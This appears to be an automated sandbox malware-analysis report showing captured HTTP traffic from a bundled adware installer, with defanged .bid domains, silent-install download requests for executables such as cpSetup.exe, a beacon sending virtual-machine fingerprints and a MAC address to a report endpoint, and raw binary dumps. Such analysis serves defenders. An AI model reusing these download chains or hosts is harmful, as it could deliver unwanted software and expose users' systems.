Content-Type: text/html

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Sun, 13 Nov 2016 05:18:30 GMT

Content-Length: 0

HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/8.5..X-Powered-By: PHP/5.3.28..Date: Sun, 13 Nov 2016 05:18:30 GMT..Content-Length: 0..

GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon2-green.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.deliverydlcenter.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/png

Content-Length: 3782

Connection: keep-alive

Date: Mon, 10 Oct 2016 08:52:43 GMT

Last-Modified: Fri, 07 Oct 2016 08:02:51 GMT

ETag: "f62071084680ed861fa12c3ea47cb6e1"

Accept-Ranges: bytes

Server: AmazonS3

Age: 64443

X-Cache: Hit from cloudfront

Via: 1.1 3ef066dcf359ad5dbc339df978147194.cloudfront.net (CloudFront)

X-Amz-Cf-Id: pX-9uxJlT7jHPHPa1yz36Uw4GIzmVJmi_A2mcbd77axMEEGJVaJgoQ==

.PNG........IHDR...>...E......$UF....tEXtSoftware.Adobe ImageReadyq.e<...hIDATx..[kl#W....yO......?..u..H..P..J...$@..K...l. .}..}P@@..J........q..H@3.E.u@.".Zg7.$..$q..f..\...c;....(W;.].x.~......;....?......c.|X........B...;D...rv&.M..eE...eZ..1Ts5....E?..{O.x....B.. ..=B...D...~.,,..p.493...XB.R...2&......1...., .5.....b[.B`ae...oF...p.FZ.,."..zh......p...yH.l>!4:. .[aXi.3.... |.. ..t.....J...../4...(T.meL..'9ceC.]R//...FkW.Z...vpb6d..?......=.x..M.RO....P..p[c-..K.p.,v........K.|.=......:!..2............<`....j....Mq...C<{*L2j.^05g.q=}qy`..sy ]3.UK.j.....o.Z.......2&u5{.fw.}6.Oe8cuCO._..<.Jd.9.;.......[4.2.i....y.K.Z.......q..J.A^..g......1..|.lN.)8............f.q]...4............I..c...=.2..[..2LZ.1rIf....3.....M...2.M.f..R siU..i..0.....9_.?.'...S.R#.sN.{.s.........@7...%..{........w>....A.V...{?..V9.*G.....,.......lA.:7.........E.q.C..._W.Dd.k;&D..4..E}3.}..X.c.)`.!.$...R.........X.<....^.PH..NO.)...^KM-.......:.8...Q..S7.`. ...V...D.@.'.<..x!..1.PU.ktr<R.@.W.......t....l..'d..n.'|v*...R..=.uau0..uC...S.......G....F............f...h.XN.h..-(..../....l.f..fI..`G.|.....\...bf..Q*...p....Y..R......w........\aj.TR..IUA.d.6...@.DqNi..8.#.l!)l(,V....6m.<...E..../.y....P.......y.........O.f....-.....Y....B.(.s..r....z<jf....m...[Hc...%5.....$..x.Z...u2.....h.........94{.....9...\.wE.?....!E.\l..S...).....A...2FV.y..Z..d.HEPsy....!.*X.......?s|.qM..y..U.s.......m....Zi.T......C....m.nB.......4.....Q.........) ...Ph..'.~|..nZ'.Fpk..:....3...)_|.~....H..gnM.J?k....$y......-.....

<<< skipped >>>

POST hXXp://ee.ilentialnessme.bid/installer.php?affId=2291&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&trackingId=135176390&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1

Host: ee.ilentialnessme.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

Content-Type: application/x-www-form-urlencoded

Content-Length: 162

cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=2664&id[]=2665&id[]=2666&id[]=2667&id[]=2668&id[]=2669&id[]=2670&id[]=2671&id[]=2672&id[]=2673&id[]=2674&id[]=2675

HTTP/1.1 200 OK

Content-Type: text/html

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Sun, 13 Nov 2016 05:18:22 GMT

Connection: close

Content-Length: 37480

....~h........7.zEh....< ..v.H....x.3..zPrd9F..........8. ..oH.X....{<...v"..VC...j.R.'L.3. ....;6.|.d,.z..$........1..1f%..Be ..M..7...K.)... ..B.(...:.....Z.........P2...*.z)NZei......H[ 3.......3...m.I._AF.......6...@.$..[.v.....>....Y.o..<....i.|...T...!.#..M..............SD.(....i..<R....|6.H.v[.B2....5j...$.pyj..^...9...D..~.. ....6...8..._.#{..;z...6..u..d.K.....s..,zW...c...[.d..4.#.O.S..zoD...4...-[A..s...A...Y..l....*zd...y...V.3;~-...%....t.ft.......e.MK..xMs...W?K.9.BA.Hs..q..d7..(.;o...O....F.... ..m.(......S..lZ..R...... ..[..4.t...u..u...<;*#.)_S.d.V,s. jX.).@.oM....k..}./^-l.e..uE.......l..,.W#......vK.i..yGY..H`..z.M5}..2(...-F&o./.$.4T.I?.!...7Ez.G.>.....&....~.C3...(a#..`..AHs....H.v)So....~.).../).:#.<.{.).V....f....V.F.X..?.......(....f.E..E..r...X......Y......5. ..3.-.H.....<.Z..Yo.y..v...[.......t.......Dl.3.......LJ3Wj...:...).]k.W"6..W.5AB....t....bd`|....e^.K......N..\.-m...0T...?.....I.%...x4..{...........^[.X..^...@o...CN....0.@...)0.#..4)...GA..KX1....u?.....)Vg..pz..G...O.,K"c".0.(@ ..@..2......U......m.to...r.1.4. a..G.v.._0.a......c~..........R!v.CVH..-&..q.........n ..z..C.@d...... ;w.D..S.8.F. .VT..}1.,.>.X...U...U.Z..f...W(}-$..K%..&...K.8...IA..,y2....1I#a\e.F...uX...[{k...9\...D.Q^K.6.$fR..._.6C.uR'..}.;...$-.s....,.Pu\N..'.*..s.{r..e..H..1@.T...J.X)z..d..PR...O...f.. k...t.S....1. .]../%/_.D6...x... .J..c..>...X.N....a..."P...=B...y.'......<....Y$l.kj.......<>.[..oq....(Z..4Z.Fw.U.....>..A.ps.De.=..9MF...[;$G..H.....~...j.]..b..1

<<< skipped >>>

GET /stub_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=setup&name=Installation HTTP/1.0

Host: wet.sodcattilyrem.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Content-Type: application/force-download

Content-Length: 60652

Connection: close

Server: Microsoft-IIS/7.5

X-Powered-By: PHP/5.3.28

Content-Disposition: attachment; filename="5827498a25abb_ua.exe"

X-Powered-By: ASP.NET

Date: Sat, 12 Nov 2016 16:55:38 GMT

Age: 44593

X-Cache: Hit from cloudfront

Via: 1.1 cd57e6888980d1e458b233b5ef20ee46.cloudfront.net (CloudFront)

X-Amz-Cf-Id: i8UIml3LnG1MKA8CDNO6PQ3HlSVYkDtsv9mUevVxV14GyEXXXEltOw==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@..........................`............@.................................4........@..........................d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2....P......................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....-G..H.P.u..u..u.....@..K...SV.5.-G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..F.W....@..u.W...u....E.P.u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ

<<< skipped >>>

GET /taveara?q=setup HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0

Host: gurusetman.info

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently

Date: Sun, 13 Nov 2016 05:19:19 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d640d2d826032587efe6ad339dd60f7a71479014358; expires=Mon, 13-Nov-17 05:19:18 GMT; path=/; domain=.gurusetman.info; HttpOnly

X-Powered-By: PHP/5.4.37

Pragma: no-cache

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Cache-Control: post-check=0, pre-check=0

Last-Modified: Sun, 13 Nov 2016 05:19:19 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Location: hXXp://greates.info?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr

Access-Control-Allow-Credentials: true

Access-Control-Allow-Headers: *

Access-Control-Request-Headers: *

Server: cloudflare-nginx

CF-RAY: 300fc49e36a12914-OTP

0..HTTP/1.1 301 Moved Permanently..Date: Sun, 13 Nov 2016 05:19:19 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=d640d2d826032587efe6ad339dd60f7a71479014358; expires=Mon, 13-Nov-17 05:19:18 GMT; path=/; domain=.gurusetman.info; HttpOnly..X-Powered-By: PHP/5.4.37..Pragma: no-cache..Cache-Control: no-cache, no-store, must-revalidate, max-age=0..Cache-Control: post-check=0, pre-check=0..Last-Modified: Sun, 13 Nov 2016 05:19:19 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Location: hXXp://greates.info?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr..Access-Control-Allow-Credentials: true..Access-Control-Allow-Headers: *..Access-Control-Request-Headers: *..Server: cloudflare-nginx..CF-RAY: 300fc49e36a12914-OTP..0..

<<< skipped >>>

GET hXXp://ee.ilentialnessme.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=117&aff_sub2=151377&aff_sub3=&aff_sub4=&aff_sub5=1399165537&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1

Host: ee.ilentialnessme.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=UTF-8

Location: hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Sun, 13 Nov 2016 05:18:20 GMT

Connection: close

Content-Length: 593

<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here</a></body>..

GET /report.php?typ=sys&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&transId=135176390&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.44531263149565414 HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Pragma: no-cache

User-Agent: InstallCapital

Host: ee.ilentialnessme.bid

HTTP/1.1 200 OK

Content-Type: text/html

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Sun, 13 Nov 2016 05:18:30 GMT

Content-Length: 0

HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/8.5..X-Powered-By: PHP/5.3.28..Date: Sun, 13 Nov 2016 05:18:30 GMT..Content-Length: 0..

GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0

Host: VVV.dosecuretrips.com

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Access-Control-Expose-Headers: X-Target-FN

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

Content-Disposition: attachment; filename="Setup__2140_il2.exe"

Content-Type: application/x-msdownload

Date: Sun, 13 Nov 2016 05:19:26 GMT

Expires: Sat, 26 Jul 1997 05:00:00 GMT

Last-Modified: Sun, 13 Nov 2016 05:19:26 GMT

Pragma: no-cache

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

X-Target-FN: Setup__2140_il2.exe

Content-Length: 716800

Connection: Close

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.u.....R..4....R.......R..4..Q.R.......R..4....R...R...R.......R.......R...S...R..4....R..4....R..4....R.Rich..R.........................PE..L...=0.X.................b........................@..........................P............@.............................................8E......................\Z.. ...................................@...............\............................text...[`.......b.................. ..`.rdata..d............f..............@..@.data....[...@...4..................@....rsrc...8E.......F...L..............@..@.reloc..@].......^..................@..B......................................................................................................................................................................................................................................................................................................... ..........3.9.....V........D$.....^...j ..NF......3.9.tRj.h|.G..M..E......]..].......]..}...E.s..E.SSS.6Ph..G......YY...6....F.Sj..M............3..H..H....3....H..|.H..x.H..t.H....H..t.H..3.9..XH.t..=.XH....XH.s...XH..j..6TF.......}.j.....G.X3.3..G.._.f.O..]..G83.._4f.G$.u..w@.E........Gp....._l3.f.G\........G............................................................................................_x._|................V........D$..t.V..=..Y..^...j...TF......j....H.X3.3..}.....H...G....H.....H.f....H.

<<< skipped >>>

GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.deliverydlcenter.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 2024

Connection: keep-alive

Date: Mon, 10 Oct 2016 08:52:42 GMT

Last-Modified: Fri, 07 Oct 2016 08:03:05 GMT

ETag: "d9eb4e61c136f58576485da85fc9897d"

Accept-Ranges: bytes

Server: AmazonS3

Age: 64430

X-Cache: Hit from cloudfront

Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)

X-Amz-Cf-Id: RNnNcZpMOUg5CGj4HVkrzEXlQWhIkZKaZJi-h-cKXyELoonJcVIG7Q==

..<html><head>.. <meta charset="utf-8">.. <meta name="description" content="">.. <meta name="viewport" content="width=device-width, initial-scale=1">.. <title>Thank You Page</title>.. <link rel="stylesheet" href="assets/css/style.css">.. <body>.. <header class="header">.. .<div class="header-top green"></div>.. .<div class="header-bottom grey">.. ..<h1 class="typ">.............. .... ....................</h1>.. .</div>.. </header>.. <div id="widget">.. <div class="adnl_zone">.. <script type="text/javascript">.. /*<![CDATA[*/.. supp_key = "575f4f5e34f49079faeab77365968081";.. supp_time = new Date().getTime();.. supp_channel = "";.. supp_code_format = "ads-sync.js";.. supp_click = "";.. supp_custom_params = {};.. /*]]>*/.. </script>.. <script type='text/javascript' src='//VVV.1-1ads.com/js/show_ads_supp.js?pubId=907'></script>.. </div>.. </div>.. <footer class="footer green">.. .<div class="container">.. ..<h3 class="green">.......... .................., .......... .................. ....................:</h3>.. ..<ul class="steps

<<< skipped >>>

GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css HTTP/1.1

Accept: text/css

Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.deliverydlcenter.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/css

Content-Length: 1967

Connection: keep-alive

Date: Mon, 10 Oct 2016 08:52:43 GMT

Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT

ETag: "92657668b4257695bd2699a787aee60b"

Accept-Ranges: bytes

Server: AmazonS3

Age: 64444

X-Cache: Hit from cloudfront

Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)

X-Amz-Cf-Id: TkxLSAtQrofDzYiZGGzEPDHmdWKYGV5NKLAXdAGX1Nu99LN1UPCSVg==

<<< skipped >>>

GET /favicon.ico HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: ic-dc.deliverydlcenter.com

Connection: Keep-Alive

HTTP/1.1 403 Forbidden

Content-Type: application/xml

Transfer-Encoding: chunked

Connection: keep-alive

Date: Sun, 13 Nov 2016 05:18:13 GMT

Server: AmazonS3

Age: 82

X-Cache: Error from cloudfront

Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)

X-Amz-Cf-Id: fXaJKV8QCC1-uGe2jqVL60EcnCsHeMmojKoDEP-Ks0uEmJniEtuHug==

f3..<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5BB8DEA19076C304</RequestId><HostId>LWCozxd6XPbPKEl3NYSn/ yXE9CAeg0hAv0mqYqDTyL7Fc7lhCJdt9GChZUouqV4QcMLE2bdimk=</HostId></Error>..0..HTTP/1.1 403 Forbidden..Content-Type: application/xml..Transfer-Encoding: chunked..Connection: keep-alive..Date: Sun, 13 Nov 2016 05:18:13 GMT..Server: AmazonS3..Age: 82..X-Cache: Error from cloudfront..Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)..X-Amz-Cf-Id: fXaJKV8QCC1-uGe2jqVL60EcnCsHeMmojKoDEP-Ks0uEmJniEtuHug==..f3..<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5BB8DEA19076C304</RequestId><HostId>LWCozxd6XPbPKEl3NYSn/ yXE9CAeg0hAv0mqYqDTyL7Fc7lhCJdt9GChZUouqV4QcMLE2bdimk=</HostId></Error>..0..

GET /js/show_ads_supp.js?pubId=907 HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: VVV.1-1ads.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Cache-Control: max-age=3600

Transfer-Encoding: chunked

Date: Sun, 13 Nov 2016 05:19:34 GMT

Connection: close

2000..var supp_ads_host_overridden="//VVV.1-1ads.com";.var supp_key,supp_channel,supp_code_format,supp_ads_host,supp_ads_host_overridden,supp_click,supp_custom_params,supp_width,supp_height,supp_target_id,supp_template_target_id,SuppConfig,SuppAdsConfig=SuppConfig,CustomWLAdServer=CustomWLAdServer||{requests:[]};.CustomWLAdServer.sendbackPlacementKeyFromRequests=function(a){var c=CustomWLAdServer;if(c.requests&&0<c.requests.length&&c.passbackCallbacks&&c.passbackCallbacks["v2-" a])for(var b in c.passbackCallbacks["v2-" a]){var d=c.findRepReqByKey(b);(d=d&&(d.supp_target_id||d.elemId))&&document.getElementById(d)&&c.doPostMessageFuncIntoIFrames(document.getElementById(d),"customwl.plkey.for.banner" a "\x3d" b)}};.try{var messageEventListener=function(a){if(a&&a.data&&"string"===typeof a.data){if(0==a.data.indexOf("rrImpl")){try{eval("CustomWLAdServer." a.data)}catch(c){console.warn(c)}return!0}if(0==a.data.indexOf("sendRequestInfo:")){var b=a.data.substring(16),b=CustomWLAdServer.findRepReqByKey(b);if(null!=b)return b.elemId&&document.getElementById(b.elemId)&&document.getElementById(b.elemId).contentWindow&&document.getElementById(b.elemId).contentWindow.postMessage("requestInfoMessage:" JSON.stringify(b),."*"),!0}if(0===a.data.indexOf("customwl.plkey.request.for.banner\x3d")){var b=a.data.split("\x3d")[1],d=CustomWLAdServer,e=d.passbackCallbacks&&d.passbackCallbacks["v2-" b];if(e)if(1==Object.keys(e).length)e[Object.keys(e)[0]]();else d.sendbackPlacementKeyFromRequests(b)}if(0==a.data.indexOf("requestInfoMe

<<< skipped >>>

GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon3-green.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.deliverydlcenter.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/png

Content-Length: 1519

Connection: keep-alive

Date: Mon, 10 Oct 2016 08:52:43 GMT

Last-Modified: Fri, 07 Oct 2016 08:02:51 GMT

ETag: "659184a48243f6ae257bc88d601ac7e1"

Accept-Ranges: bytes

Server: AmazonS3

Age: 64443

X-Cache: Hit from cloudfront

Via: 1.1 0176a7920fd558900dd5f893f79acb9e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: hwFaWw-7Nj8eeAHF2MXvCTn7uuTK6GtEQuMIKFI2ctTLJUFa2FHwEQ==

.PNG........IHDR...>...E......$UF....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[.O[u.........(.E....o..............U0...Q`.%...}0..$..d....%&=<.H.|q.sNZ..R..=7.._/P...Z.....rN.....;..0`.......0`.....S<q..x.6...8. .....4=A].....Y...L<y~&\".I.G..X.Y,......L\{......./..s.Id.1L....si6o@.c.4.h...5:8.....!...............j..W.h..UvZ...bC.B....1..j\YZ..9...9....r0..8......V...\..[.HO.y..`.{w..SQ.[.m..L.V.nli.....L..`..n&...\.bZ.U.@.q...u.......wJ.~.f......:.......x.i.g.......s...>4...J...z .^r.z..3....RO<y.wI.).Z..v......^p.u.y"H....W*6Q..tX."?..w...'...%. .......f.|o....3.s......:.Zz].2.............|.v..U....c..z.b....i........>....q.S .....'k3...6.......>D.qY.E............................1e1=.Ff)..o..|_..O...z...P6. ... ....?O.S...=.DtU..c.-C....SG.%.Y....*.......#.=y.K.quyM.......g.(....\9y.Y..s\v....!.......>@..d............I..d{.m...!..zFR..........._#rr9.g....ut~....!..;....-....*w...Hx.E.C]........}.....c.n"..>.".._.ZQ.C.."....q.j"...... ......._I....S.g.....f...o3..Q...jpf......s.)...1B].SO..3..$N..].g(.z......D.......T...C/......u.a}....`. ":m.-m..W.....4..JJ.}...%.U.T....-.N.....m."..?YE...q=....|P.....X.H,.......|..J.F.#M.......w.t...Xrr&..e=;.a......R.e.RN...2....n-....g..8d../;....b......p..).&.0Xm.._.Gs.T..V.y.mo..3....h...F.-.^HH......k....2i...v..&.......j..s,...~ok......=......n.`.x..1.-.I...G..V...F...,U.K...Hb".;p...A/...s.V/.._....7q.S.|....&.~81v-..../...!.G.Q.m............\./*.$h...>..*.u.@b.ZM~h1yH..W.E...Wp].a.'{....8r.A,...r.....).hY...?.KE.u.........._...d

<<< skipped >>>

GET /get.php?ses=429155916441231936 HTTP/1.0

Host: away.yosauruslega.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 636416

Connection: close

Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0

Pragma: no-cache

Expires: Sun, 01 Jan 2014 00:00:00 GMT

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Access-Control-Allow-Origin: *

Content-Transfer-Encoding: Binary

Content-disposition: attachment; filename="cpSetup.exe"

Date: Sun, 13 Nov 2016 05:18:17 GMT

X-Cache: Miss from cloudfront

Via: 1.1 420810dc8ca5cb74b64cae9e4b264cc9.cloudfront.net (CloudFront)

X-Amz-Cf-Id: WzMfcmhZ-U-zig-ivUSgMwISw4lkFuvogIDTJNXx0sRnwuKboE_IfQ==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4.Q.U...U...U..r....U..r....U..r....U.......U.......U.......U.... ..U...U...U..S....U..T....U...U|..U..S....U..Rich.U..........................PE..L...h.'X.................\...t...............p....@.......................... ............@.....................................P........5......................| ......p...........................@...@............p..p............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data....Y...0...<..................@....gfids...............P..............@..@.tls.................R..............@....rsrc....5.......6...T..............@..@.reloc..| .......,..................@..B.................................................................................................................................................................................................................................4.I..6;..h.iD...H.I.......D.I.......4.I.......Y.................L.I...:..j.h .D...`.I.......\.I.......L.I....:..h.iD..k...Y....j..g...h.iD...8.D..d.I..J........d.I..h.I....jI..a...h.jD..'...Y.....................X........F..F......O..O..o....^R].c.h..E...!..:..|..L..9.....P.u..E....8.........?b.0.....E..D.(.}!W.0...YY....D...|...v........D.....v............u..E..............'......|..D..8.....P...U......E..M..E..E..E.P.|..L.P.D.....]...U..Q_.u....u..dv.........B..q7;<..L.s&......?...k.0.....E..D.!.t.

<<< skipped >>>

GET hXXp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1

Host: ee.ilentialnessme.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

HTTP/1.1 200 OK

Content-Type: text/html

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Sun, 13 Nov 2016 05:18:21 GMT

Connection: close

Content-Length: 1768

...S.T '.QE9..bb,........a...Y $.4$.r!.Ss......Xd<..._&.....T.....,..LMPLpR,..>..K.. .q..r.yI}P.@i..dz..K18....&8.......@.F.wO. ..<............-)....d......u.....[.....-..RD.u..>.....X].#..2.\...y..-.=.X......Y..*2..>hD..."._?......).&ceC._ 8Uw.!......`y.X6.....*......a`..f...-.v...)X....../f.jD......6..*.:..6...F..G...D%(......qm.}.`..w.JR...j.._VB.xw..s.z.W..w....*..?1./.jRp..$.g..7.Xv)...........M.....b....*X.heboL...{.s>.t ........{.x......<..Q.....[...sb.=..JKx..2X.@O.$.d.Y .j{.%A.[.=..g..|N#....%!...^..q)......}^.....7dN`o..{;.A..O......g..%...r.].Dy.j.. t . p.x.|R.[#...$...G. .?..H....8..... ..wc......W..hv:z...[...[...8....V.....v.)..j.......Do".fq"..@..jI..........]...t.;.3.8gt\....F.$...A}.ex...:...,4..n%kF;.';3.../.......H.J.,|.r..I..$%M..C...l..Y\.........Z.......9r..=A....X..........2[9 cJ$....D3b.|....h. *......eh.........gR........ ..!..a.\y]..w..1.|....[..........8.Y.XT/.i.&.2i...??>.....EZS."........*#x..C...,T.......#%.js,.1..tT#../...htZ9%.......V.v.ri..n.\A.......g. .\}..........lI..j.......six}.^ .J]9.......t..Y.s..n.B..am%.Vkv...H4./&.4.E..C.w.?i..^&........g2d:..'.&Gc...m.i...O..<...}4VeJ..2..Y......B..... .|.Y.r.?R.c.. ..B....p,....rz..Q....O.h....c........?.yj.I..9..D.#....q.c.....8.....f..f.e.....M...gc.,..i:*....I=&6.o....*..l....hN.......8,(...9.4...O.u../.{..N.~..k.H.OX^......hYm..]c..#....V..1..d.m.Q....I.LX....].T.J.~7."....6aA............itU.4B.G....Sz.~.c.A...59.....e...g{...%...T .N.@...>.6z.lR....%.......p..7s..Z.D>....D"Q.Z..S./a..c.`#-.......

<<< skipped >>>

Map

The Application connects to the servers at the folowing location(s):

Strings from Dumps

iexplore.exe_804:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

